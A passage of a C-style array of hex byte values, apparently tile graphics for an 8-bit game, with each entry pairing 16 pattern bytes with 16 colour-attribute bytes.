{0x90,0x60,0x90,0x60,0x90,0x60,0x90,0x60,0x60,0x90,0x60,0x90,0x60,0x90,0x60,0x90,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x50,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x55,0xA0,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0x55,0xAA,0x54,0xAA,0x54,0xAA,0x55,0x55,0xAA,0x54,0xAA,0x54,0xAA,0x54,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x00,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x00,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0xAA,0x55,0xAA,0x55,0x2A,0x55,0x2A,0x55,0x55,0xAA,0x55,0x2A,0x55,0x2A,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0xFF,0x30,0xBF,0x60,0x7E,0x60,0x7E,0x55,0xFF,0x30,0x20,0xFF,0x60,0x7E,0x40,}, {0xE0,0xF0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xF0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xC1,0xFD,0xC1,0xFD,0x03,0xFB,0xE2,0x11,0xFF,0xC1,0xFD,0x81,0xFF,0x03,0xFB,0x2A,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0xFF,0x1B,0xDB,0x55,0xAA,0x55,0xAA,0x55,0x07,0xFB,0x13,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,}}, {{0x26,0xBF,0x70,0x7F,0x61,0x7F,0x38,0x05,0xFF,0x2C,0xF7,0x60,0x7F,0x76,0x3B,0x8A,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,}}, {{0xAA,0xFF,0x60,0xFF,0x80,0xFF,0x80,0x55,0x55,0x18,0xEF,0xC0,0xFF,0x80,0xFF,0xAA,}, {0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,}}, {{0xAA,0x55,0xAA,0xFF,0x02,0xFF,0xFE,0x05,0x55,0xAA,0x55,0x01,0xFF,0x06,0xFD,0x02,}, {0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xF0,0xE0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0xFF,0x08,0xFE,0x55,0xAA,0x55,0xAA,0x55,0x07,0xF8,0x10,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,}}, {{0x31,0xBD,0x61,0x7F,0x6F,0x73,0x22,0xFB,0xFF,0x21,0xFD,0x63,0x7F,0x73,0x3B,0x42,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xF0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xF0,0xF0,0xE0,0xF0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0xFF,0xCE,0xD7,0x55,0xAA,0x55,0xAA,0x55,0xC2,0xFF,0xF7,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,}}, {{0x86,0xF7,0x0C,0xEF,0x48,0xEF,0x18,0x45,0xD6,0x04,0xFF,0x0C,0xEF,0x88,0xFF,0x8A,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,}}, {{0x01,0xFE,0x02,0xFF,0x06,0xFF,0x4C,0xEF,0xFF,0x02,0xFB,0x06,0xF7,0x3C,0xCF,0x8C,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x8C,0xEF,0x18,0xDF,0x3B,0xDD,0x10,0x55,0xEF,0x08,0xFF,0x18,0xFF,0xDC,0x57,0x8A,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xF0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0xFF,0xB8,0x9F,0x55,0xAA,0x55,0xAA,0x55,0x70,0xBF,0x1B,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,}}, {{0x18,0xDF,0x10,0xFE,0x20,0xFE,0x81,0xFD,0xD8,0x10,0xDF,0x30,0xBE,0x40,0xFF,0x01,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xA8,0x54,0xAA,0x54,0xAA,0x54,0xAA,0x54,0x50,0xA8,0x54,0xAA,0x54,0xAA,0x54,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0x54,0xAA,0x54,0xAA,0x54,0xAA,0x54,0x54,0xAA,0x54,0xAA,0x54,0xAA,0x54,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x00,0x00,0x2A,0x15,0x28,0x30,0x07,0x05,0x00,0x00,0x15,0x2A,0x10,0x03,0x20,0x0A,}, {0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xB0,0xB0,0x20,0x20,0xE0,0xE0,0xE0,0xB0,0xE0,0xB0,}}, {{0x07,0x07,0x03,0xF3,0x01,0x09,0x80,0xC0,0x07,0x07,0xF3,0x03,0x11,0x81,0x40,0xA0,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xB0,0xB0,0xE0,0xF0,0xE0,0xF0,0xE0,0xB0,0xB0,0xB0,}}, {{0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x7F,0x7F,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x7F,0x7F,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x00,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x08,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x08,0x14,0x2A,0x14,0x2A,0x15,0x2A,0x15,0x14,0x2A,0x14,0x2A,0x15,0x2A,0x15,0x2A,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x86,0xF7,0x04,0xFF,0xE0,0x15,0xAA,0x00,0xFF,0x06,0xF7,0x18,0xEF,0x2A,0x55,0x08,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,}}, {{0x08,0x14,0x2A,0x14,0x81,0x9D,0x81,0x9D,0x14,0x2A,0x14,0x2A,0x9D,0x81,0x9D,0x81,}, {0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,}}, {{0x3F,0x3F,0x3F,0x3F,0x3F,0x7F,0x7F,0x7F,0x3F,0x3F,0x3F,0x3F,0x3F,0x7F,0x7F,0x7F,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x01,0xFF,0x02,0xFF,0x38,0x05,0xAA,0x00,0xFD,0x03,0xFB,0x1C,0xFF,0x8A,0x55,0x00,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0x20,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0x20,}}, {{0xFC,0xF8,0xF8,0xF9,0xF8,0xF9,0xF8,0xF9,0xFC,0xF8,0xF9,0xF8,0xF9,0xF8,0xF9,0xF8,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x2A,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x28,0x27,0x1F,0x3F,0x3F,0x3F,0x3F,0x3F,0x10,0x07,0x1F,0x3F,0x3F,0x3F,0x3F,0x3F,}, {0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x08,0x04,0x0A,0x14,0x2A,0x14,0x2A,0x14,0x10,0x02,0x14,0x2A,0x14,0x2A,0x14,0x2A,}, {0xB0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xB0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x14,0x2A,0x14,0x2A,0x14,0x2A,0x00,0x14,0x2A,0x14,0x2A,0x14,0x2A,0x14,0x00,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0x20,0x40,0x22,0x55,0x2A,0x55,0x2A,0x55,0x10,0x00,0x55,0x2A,0x55,0x2A,0x55,0x2A,}, {0xB0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xB0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x54,0x01,0x7D,0x03,0x7B,0x07,0x07,0x54,0x2A,0x7D,0x01,0x7B,0x03,0x77,0x07,}, {0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x0F,0x03,0x01,0x14,0x2A,0x14,0x2A,0x15,0x0F,0x03,0x31,0x28,0x14,0x2A,0x15,0x2A,}, {0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x15,0x2A,0x15,0x2A,0x15,0x2A,0x15,0x15,0x2A,0x15,0x2A,0x15,0x2A,0x15,0x2A,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x03,0x03,0x01,0xFD,0xA8,0x54,0xAA,0x55,0x03,0x03,0xF9,0x01,0x54,0xAA,0x54,0xAA,}, {0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0x55,0xAA,0x54,0x01,0xFD,0x03,0x03,0x55,0xAA,0x54,0xAA,0xFD,0x01,0xFB,0x03,}, {0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,}}, {{0x81,0x9D,0x81,0xCB,0xC3,0xCB,0xC3,0xCB,0x9D,0x81,0x9D,0xC3,0xCB,0xC3,0xCB,0xC3,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xC3,0xCB,0xE7,0xE7,0xE7,0xE7,0xE7,0xE7,0xCB,0xC3,0xE7,0xE7,0xE7,0xE7,0xE7,0xE7,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x7F,0x7F,0x7F,0x7F,0xFF,0xFF,0xFF,0xFF,0x7F,0x7F,0x7F,0x7F,0xFF,0xFF,0xFF,0xFF,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xE0,0xC0,0x80,0x15,0x2A,0x15,0x2A,0x15,0xE0,0xC0,0x8F,0x0A,0x15,0x2A,0x15,0x2A,}, {0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x15,0x2A,0x15,0x2A,0x9F,0xC0,0xE0,0x15,0x2A,0x15,0x2A,0x15,0x80,0xCF,0xE0,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,}}, {{0x3F,0x3F,0x3F,0x3F,0xBF,0xFF,0xFF,0xFF,0x3F,0x3F,0x3F,0x3F,0xBF,0xFF,0xFF,0xFF,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x03,0x01,0xA8,0x54,0xAA,0x55,0xAA,0x55,0x03,0x01,0x54,0xAA,0x55,0xAA,0x55,0xAA,}, {0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x00,0x00,0x2A,0x14,0x2A,0x14,0x2A,0x14,0x00,0x00,0x14,0x2A,0x14,0x2A,0x14,0x2A,}, {0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x07,0x07,0x03,0x73,0x01,0x79,0x28,0x54,0x07,0x07,0x73,0x03,0x79,0x01,0x54,0x28,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,}}, {{0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x7F,0x3F,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x7F,0x3F,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xF8,0xF9,0xF8,0xF9,0xF8,0xF9,0xF8,0xF9,0xF9,0xF8,0xF9,0xF8,0xF9,0xF8,0xF9,0xF8,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x07,0xFB,0x01,0x54,0xAA,0x54,0xAA,0x54,0x07,0x03,0xFD,0xAA,0x54,0xAA,0x54,0xAA,}, {0xF0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x7F,0x7F,0x7F,0xBF,0x3F,0x5F,0x07,0x50,0x7F,0x7F,0x7F,0x3F,0xBF,0x1F,0x67,0x28,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,}}, {{0x0A,0xE3,0xF8,0xFC,0xFC,0xFE,0xFE,0xFE,0x05,0xE0,0xF9,0xFC,0xFC,0xFE,0xFE,0xFE,}, {0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x2A,0x14,0x2A,0x14,0x2A,0x14,0x2A,0x14,0x14,0x2A,0x14,0x2A,0x14,0x2A,0x14,0x2A,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x54,0x2A,0x55,0x2A,0x55,0x2A,0x55,0x54,0x2A,0x55,0x2A,0x55,0x2A,0x55,0x2A,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x15,0x2A,0x14,0x2A,0x3D,0x03,0x0F,0x15,0x2A,0x15,0x2A,0x14,0x01,0x33,0x0F,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,}}, {{0x7F,0x7F,0x7F,0xFF,0xFF,0xFF,0xFF,0xFF,0x7F,0x7F,0x7F,0xFF,0xFF,0xFF,0xFF,0xFF,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x2A,0x15,0x2A,0x15,0x2A,0x15,0x2A,0x00,0x15,0x2A,0x15,0x2A,0x15,0x2A,0x15,0x00,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,}}, {{0xF8,0xF9,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF9,0xF8,0xF9,0xF8,0xF8,0xF8,0xF8,0xF8,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xFC,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xF8,0xFC,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0xAA,0x54,0xAA,0x54,0xAA,0xFD,0x03,0x07,0x54,0xAA,0x54,0xAA,0x54,0x01,0xFB,0x07,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,}}, {{0x2A,0x15,0x2A,0x15,0x2A,0x15,0x0A,0x20,0x15,0x2A,0x15,0x2A,0x15,0x2A,0x15,0x20,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,}}, {{0xFE,0xFE,0xFE,0xFC,0xFC,0xF8,0xE0,0x01,0xFE,0xFE,0xFE,0xFC,0xFC,0xF8,0xE1,0x02,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,}}, {{0xAA,0x54,0xAA,0x54,0xAA,0x54,0xAA,0x54,0x54,0xAA,0x54,0xAA,0x54,0xAA,0x54,0xA8,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xA8,0x50,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x50,0xA0,0x55,0xAA,0x55,0xAA,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xFE,0xFE,0xFE,0xFE,0xFE,0xFE,0xFE,0xFE,0xFE,0xFE,0xFE,0xFE,0xFE,0xFE,0xFE,0xFE,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x00,0x00,0xAA,0x54,0xAA,0x54,0xAA,0x54,0x00,0x00,0x54,0xAA,0x54,0xAA,0x54,0xAA,}, {0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x7F,0x7F,0x7F,0x7F,0x7F,0x7F,0x7F,0x7F,0x7F,0x7F,0x7F,0x7F,0x7F,0x7F,0x7F,0x7F,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x00,0x00,0x2A,0x55,0x2A,0x55,0x2A,0x55,0x00,0x00,0x55,0x2A,0x55,0x2A,0x55,0x2A,}, {0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x00,0x00,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x00,0x00,0x55,0xAA,0x55,0xAA,0x55,0xAA,}, {0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0x20,0x20,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x0A,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x05,0x2A,0x55,0xAA,0x55,0xAA,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x54,0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x2A,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x55,0x55,0xAA,0x55,0xAA,0x55,0xAA,0x55,0xAA,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0xFF,0x0C,0xEF,0x55,0xAA,0x55,0xAA,0x55,0x03,0xFD,0x08,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,}}, {{0xAA,0x55,0xAA,0x55,0xAA,0xFF,0x01,0xFD,0x55,0xAA,0x55,0xAA,0x55,0x01,0xFD,0x01,}, {0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xF0,}}, {{0x18,0xDE,0x18,0xDE,0x01,0xFD,0x01,0xFD,0xFF,0x18,0xDE,0x10,0xDF,0x01,0xFD,0x01,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x03,0xFF,0x80,0x55,0xAA,0x55,0xAA,0x55,0xFF,0x3F,0x00,0xAA,0x55,0xAA,0x55,0xAA,}, {0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x13,0xFF,0xB0,0xBF,0x20,0xFF,0x61,0x7D,0xFF,0x7E,0xB3,0x30,0xBE,0x61,0x7D,0x41,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x41,0xFC,0x2A,0x55,0xAA,0x55,0xAA,0x55,0x7D,0xC0,0x54,0xAA,0x55,0xAA,0x55,0xAA,}, {0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x1C,0xEF,0x40,0xFF,0x70,0x3F,0x18,0xDF,0xFF,0x68,0x6F,0xC0,0x7E,0x38,0x9F,0x13,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x23,0xFB,0x28,0x55,0xAA,0x55,0xAA,0x55,0xFB,0xC3,0x50,0xAA,0x55,0xAA,0x55,0xAA,}, {0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x03,0xFC,0x08,0xFF,0x10,0xFE,0x31,0xBF,0xFF,0x04,0xFF,0x18,0xDE,0x30,0xBF,0x33,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x3D,0xB5,0x88,0x55,0xAA,0x55,0xAA,0x55,0xBD,0x31,0x14,0xAA,0x55,0xAA,0x55,0xAA,}, {0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x18,0xFF,0xD9,0x5D,0x10,0xFE,0x20,0xBE,0xFF,0x38,0xDF,0x10,0xDF,0x30,0xBE,0x24,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x39,0xAC,0xAA,0x55,0xAA,0x55,0x03,0x50,0xBF,0x20,0x14,0xAA,0x55,0xAA,0xFF,0xA8,}, {0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x03,0xFB,0x03,0xFB,0x07,0xF7,0x06,0xF6,0xFF,0x03,0xFB,0x02,0xFF,0x07,0xF6,0x04,}, {0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,0xE0,0xF0,}}, {{0x04,0xFF,0xA2,0x55,0xAA,0x55,0xAA,0x55,0xF6,0x0C,0x45,0xAA,0x55,0xAA,0x55,0xAA,}, {0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,0xF0,0xE0,0xE0,0xE0,0xE0,0xE0,0xE0,}}, {{0x1C,0xEF,0x4D,0xFD,0xB0,0xDE,0x80,0xFE,0xFF,0x6C,0x6F,0x98,0xFF,0xC0,0xFE,0x84,}, 